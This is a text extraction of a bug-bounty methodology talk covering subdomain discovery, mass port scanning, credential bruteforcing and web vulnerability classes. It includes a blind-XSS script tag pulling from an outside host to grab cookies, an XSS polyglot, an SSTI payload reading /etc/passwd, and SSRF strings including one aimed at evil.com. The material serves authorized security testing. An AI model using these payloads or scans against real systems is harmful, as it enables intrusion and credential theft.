TBHM2.1 (P)

Download as pdf or txt
Download as pdf or txt
You are on page 1of 76
At a glance
Powered by AI
The document discusses various techniques for security testing including subdomain discovery, bruteforcing, and attacks such as SSTI and SSRF. It provides an overview of tools like Sublist3r and Massdns and compares their performance. Useful links and resources are also included for further reading.

Techniques discussed include scraping search engines and APIs, using tools like Sublist3r, Enumall and Nmap for subdomain discovery. Specific scanners and methods like recon-ng, Google, Baidu, Crt.sh etc are mentioned.

Tools compared for subdomain bruteforcing were Subbrute, Gobuster, Massdns, dns-parallel-prober and Blacksheepwall. Massdns was the fastest, finding 213 subdomains in under 2 minutes while Blacksheepwall was the most thorough, finding 61 subdomains after over 4 hours.

The Bug Hunters

Methodology v2.1
whoami

★ Jason Haddix - @jhaddix


★ VP of Trust and Security @Bugcrowd
★ 2014-2015 top hunter on Bugcrowd (Top 20 currently)
★ Father, hacker, blogger, gamer!
What this talk is about...

Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
history && topics

★ philosophy shifts
Aka “How to Shot Web” @ DEFCON23
★ discovery techniques ★ Subdomain & Discovery
★ mapping methodology ★ SQLi
★ parameters oft attacked ★ XSS
★ useful fuzz strings ★ File Uploads
★ bypass or filter evasion techniques ★ CSRF
★ new/awesome tooling ★ Privilege, Auth, IDOR
★ memes
v2

★ MOAR discovery
★ xss ★ Infrastructure and config
★ ssti ★ WAF
★ ssrf ★ SOAP Testing
★ Code Inj / cmdi /
advancements in
fuzzing
light reading
Discovering New Targets
Discovery

TBHMv1 ★ (sub Scraping)Sublist3r


❏ Intro to scraping for subdomains ○ brutesubs
❏ Enumall (recon-ng, Alt-DNS wrapper) ★ (sub bruting) MaSSDNS ++
❏ Nmap Standard ○ all.txt list
★ (port scanning) MASSCAN ++
○ Asn + nmap style
Sublist3r
Sublist3r

★ Plazmaz Fork
★ Fleetcaptain fork
Sublist3r

★ Fleetcaptain fork
Sub Scraping

recon-ng/enumall Both sublist3r


ssltools.com API Google (Recon-ng now handles captcha) Baidu

HackerTarget.com API Bing Ask

Shodan Crt.sh DNSDumpster (scans.io)

ThreatCrowd Virustotal

Zoomeye (not core) Netcraft Ptrarchive.com

Threatcrowd regged by email (not core)

Zone transfer (not core)

RiskIQ API (not core)

Censys.io (not core)


★ Some configuration required
○ Update Docker IMage with non core
recon-ng modules
○ .env file
○ Disable Bruteforce (see why next...)
Sub Scraping (bespoke)

★ Cloudflare
★ Censys.io
★ Haven't tested but love
the ideas
Sub Bruting

1,136,964 line subdomain dictionary (all.txt)


Tool Time to run Threads Found

subbrute errored 100 0


time ./subbrute.py -c 100 all.txt $TARGET.com | tee subbrute.output

gobuster 21m15.857s 100 87


time gobuster -m dns -u $TARGET.com -t 100 -w all.txt

massdns 1m24.167 n/a 213


time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt -

dns-parallel-prober 42m2.868s 100 43


time python dns-queue.py $TARGET.com 100 $TARGET_outputfile -i /root/work/bin/all.txt

blacksheepwall 256m9.385s 100 61


time ./blacksheepwall_linux_amd64 -clean -dictionary /root/work/bin/all.txt -domain $TARGET.com
Sub Bruting

With Massdns, why not all of them?

all.txt

https://gist.github.com/jhaddix/86a06c5dc309d085
80a018c66354a056
Acquisitions

★ Crunchbase
★ wikipedia
Port Scanning
65536 unverified Hosts (a large targets ASN)
Tool Time to run Found

masscan 11m4.164s 196


masscan
-p1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,
340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705
,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-111
4,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,
1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,15
83,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010
,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2
251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,286
9,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-
3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,38
80,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000
-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5
550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,595
9-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,
6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-79
38,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651
-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9
535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10
626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,1601
6,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,2
4800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,425
10,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848
,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389,280,4567,7001,8008,9080 -iL
$TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT

nmap zzz

Interlude... credential bruteforce

Brutespray
Nmap service
masscan credential https://github.com/x90skysn3k/brutespray
scan -oG
bruteforce

python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt


-P /usr/share/wordlist/pass.txt --threads 5 --hosts 5
Interlude... credential bruteforce
Visual Identification

★ Because of the nature of scraping and dns redirects


some sites will be gone or the same.
★ Gotta get an idea of what is up and unique
★ We also don’t know what protocol these are on
(http vs https, ++)
On App Discovery
WALKING & UNDERSTAND THE APP
Platform Identification
and CVE searching
TBHMv1
Coverage for Heavy js sites

★ ZAP Ajax Spider


★ Jsparser
★ linkfinder
jsparser
Linkfinder
Content Discovery /
Directory Bruting
TBHMv1
❏ Seclists / RAFT / Digger wordlists
❏ Patator
❏ WPScan
❏ cmsmap

★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
CommonSpeak and
Scans.io data

★ Subdomain data is
awesome
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 alexa params
Domain Domain
Identify IPs bruteforcing, Visual
scraping for Portscan
and main TLDs Resolve && add Identification
discovered TLDs new IP ranges

ASNs enumall
Reverse Whois Massdns masscan
sublist3r eyewitness
Acquisitions Manual
++
++

Platform Content Parameter


Identification Discovery discovery

Builtwith Patator or gobuster


Wappalyzer Wordlists Parameth
++ Burp Burp analyze target
XSS
XSS (not a lot)
TBHMv1
❏ polyglots
❏ Seclists (what up dan!)
❏ Flash
❏ Common input vectors
★ Blind XSS Frameworks
○ Sleepy Puppy (python)
○ XSS Hunter (python)
○ Ground control (Ruby)(small)
★ Polyglots
★ Xss mindmap
Blind XSS
G
BU

1 Jamie: I really
enjoy my super
Frans: I really admin access
enjoy my NEW this morning !!!
super admin
access this
morning !!! “><script src=//y.vg></script> 2
4

l !!#!
vascript shel
Y.vg is a a ja

3
XSSHunter
Payload:

★ The vulnerable page's URI


★ Origin of Execution
★ The Victim's IP Address
★ The Page Referer
★ The Victim's User Agent
★ All Non-HTTP-Only Cookies
★ The Page's Full HTML DOM
★ Full Screenshot of the Affected
Page
★ Responsible HTTP Request (If an
XSS Hunter compatible tool is
used)
★ Nod to beef & XSShell
XSS Polyglot #4

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csV
g/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s
XSS
Mindmap

https://github.com/jhaddix/XSS.png
Server Side Template
Injection
SSTI
TBHMv1
❏ Nothing

Core Idea: Does the application utilize a template engine? ++


★ Engine identification
○ WAPPalyzer + BuiltWith + Vulners scanner
○ Test fuzzing
○ Tooling
○ TPLmap + tplmap Burp Extension
○ Backslash powered scanner?
★ Resources
SSTI

1: https://acme.com/errorpage{{2*3}}

2:

https://acme.com/errorpage{{''.__class__.__mro__[2].__subclasses__
()[40]('/etc/passwd').read() }}
SSTI Tooling
Server Side Template Injection & Logic
/ Debug parameters

{regex + perm} template content

preview redirect

id

view

activity

name

http://acme.com/script?name={{2*3}}
Server Side Request
Forgery
SSRF Common Parameters or Injection
points from TBHMv1
TBHMv1 ★ Where? file= folder=
❏ Nothing ★ Resources
❏ Well kinda... SSRF ○ SSRF Bible (black magic)
location= style=

(visually) looks very ★ Exploit locale= template=


similar to LFI / RFI / ○ Burp Collaborator
Path/dir Traversal! ★ Honourable mention:
path= doc=

❏ REMIX! ○ display= source=

○ ^ “Blind detection of load= pdf=


path
traversal-vulnerable read= dest=

file uploads” retrieve= continue=


SSRF (GET examples)
http://ACME.com/redirect.php?url=http://google.com
http://ACME.com/redirect.php?url=//google.com
http://ACME.com/redirect.php?url=google.com
http://ACME.com/redirect.php?url=/PATH/SOMETHING/here

http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources
SSRF Resources

★ protocol
and
schema
mappings

★ Exploit
examples
Server Side Request Forgery

Many on the File Includes / Dir Traversal table

{regex + perm} dest {regex} redirect {regex + perm} uri {regex} path

{regex} continue {regex + perm} url {regex} window {regex} next

{regex} data {regex} reference {regex + perm} site {regex} html

{regex + perm} val {regex} validate {regex} domain {regex} callback

{regex} return {regex + perm} page {regex} feed {regex} host

{regex} port

http://acme.com/script?uri=ftp://site
Code Inj, CDMi, & Future
Fuzzing, ++
Code Injection + CMD
Injection + New Fuzzing

TBHMv1
❏ Sqli ★ Commix
❏ Polyglot ○ CMDi
❏ Seclists ○ Supports php code inj
❏ Sqlmap ★ Unknown Identification
❏ Params ○ Backslash Powered Scanner
❏ Tooling ★ resources
❏ resources albinowax (James Kettle)
IDOR - MFLAC

★ IDs
★ Hashes
★ Emails
Insecure Direct Object Reference

{regex + perm} id {regex + perm} user

{regex + perm} account {regex + perm} number

{regex + perm} order {regex + perm} no

{regex + perm} doc {regex + perm} key

{regex + perm} email {regex + perm} group

{regex + perm} profile {regex + perm} edit REST numeric paths

http://acme.com/script?user=21856
Code Injection + CMD
Injection
★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides
Backslash Powered Scanner
★ Generic payloads for any stack
○ Send a ‘ get an error
○ Send a \‘ and the backslash escapes your injection
character
★ Multi-tiered, Simple, and effective response analyzing
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-pow
ered-scanning-hunting.html
Infrastructure & Config
Subdomain takeover!

★ Pretty simple, check for cnames that


resolve to these services, if the
service has lapsed, register and
profit!
Subdomain Takeover
Robbing Misconfigured Sh** (AWS)
Robbing Misconfigured Sh** (git)
WAF
★ Often on newer websites we are
hampered by WAF or CDN vendors
security products
○ Cloudflare and Akamai
○ Dedicated WAFs
★ Solutions:
○ Encoding (meh)
○ Finding origin
○ Finding Dev
★ https://twitter.com/jhaddix/status/908044285437726726?lang=en
What’s in a name?

★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...

★ https://twitter.com/Jhaddix/status/964714566910279680
SOAP Services
Bespoke .nfo
Bespoke .nfo
resources!
SSRF Pivoting from blind SSRF to RCE with HashiCorp http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF

Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html

Exploiting Server Side Request Forgery on a https://sethsec.blogspot.com/2015/12/exploiting-server-side-requ


Node/Express Application (hosted on Amazon est-forgery.html
EC2) - Seth Art

Server-side browsing http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_co


considered harmful - Nicolas Grégoire nsidered_harmful.pdf

How To: Server-Side Request Forgery (SSRF) - https://www.hackerone.com/blog-How-To-Server-Side-Request-F


Jobert Abma orgery-SSRF

Escalating XSS in PhantomJS Image Rendering to http://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-r


SSRF/Local-File Read - Brett Buerhaus endering-to-ssrflocal-file-read/

Burp, Collaborate, and Listen: A Pentester https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-


Reviews the Latest Burp Suite Addition - Max pentester-reviews-latest-burp-suite-addition/
Zinkus
CommInj Pivoting from blind SSRF to RCE with HashiCorp http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF

Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html

Exploiting Server Side Request Forgery on a https://sethsec.blogspot.com/2015/12/exploiting-server-side-requ


Node/Express Application (hosted on Amazon est-forgery.html
EC2) - Seth Art

Server-side browsing http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_co


considered harmful - Nicolas Grégoire nsidered_harmful.pdf

How To: Server-Side Request Forgery (SSRF) - https://www.hackerone.com/blog-How-To-Server-Side-Request-F


Jobert Abma orgery-SSRF

Escalating XSS in PhantomJS Image Rendering to http://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-r


SSRF/Local-File Read - Brett Buerhaus endering-to-ssrflocal-file-read/

Burp, Collaborate, and Listen: A Pentester https://www.bishopfox.com/blog/2016/02/burp-collaborate-listen-


Reviews the Latest Burp Suite Addition - Max pentester-reviews-latest-burp-suite-addition/
Zinkus
SSTI Original Whitepaper - James
Kettle
http://blog.portswigger.net/2015/08/server-side-template-injection.html

Resources
OWASP SSTI Workshop - https://speakerdeck.com/owaspmontreal/workshop-server-side-template-i
Gérôme Dieu njection-ssti

Exploring SSTI in https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/


Flask/Jinja2 - Tim Tomes
https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/

Injecting Flask - Ryan Reid https://nvisium.com/blog/2015/12/07/injecting-flask/

Hi Pete!
Rails Dynamic Render to https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-201
RCE (CVE-2016-0752) - 6-0752/
John Poulin

uber.com may RCE by Flask https://hackerone.com/reports/125980


Jinja2 Template Injection -
Orange Tsai
Links Peter Yaworski https://leanpub.com/web-hacking-101

Andy Gill https://leanpub.com/ltr101-breaking-into-infosec

aboul3la https://github.com/aboul3la/Sublist3r

jhaddix https://github.com/jhaddix/domain

Tim tomes https://bitbucket.org/LaNMaSteR53/recon-ng

@infosec_au & https://github.com/infosec-au/altdns


@nnwakelam

blechschmidt https://github.com/blechschmidt/massdns

robertdavidgraham https://github.com/robertdavidgraham/masscan

jhaddix - all.txt https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056

anshumanbh https://github.com/anshumanbh/brutesubs

OJ Reeves https://github.com/OJ/gobuster
Links epinna https://github.com/epinna/tplmap

https://github.com/mak-/parameth

https://gist.github.com/anshumanbh/96a0b81dfe318e9e9560
13209e178fa9

https://github.com/ChrisTruncer/EyeWitness

https://github.com/jackmasa/XSS.png

https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66
354a056
https://github.com/lorenzog/dns-parallel-prober
Links SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bY
XBcdLUedXGb9njTNIJXa3u9akHM/edit#

https://github.com/ewilded/psychoPATH

https://github.com/commixproject/commix
Links https://github.com/qazbnm456/awesome-web-security

https://github.com/infoslack/awesome-web-hacking

https://github.com/djadmin/awesome-bug-bounty
Jason Haddix - @jhaddix
[email protected]

You might also like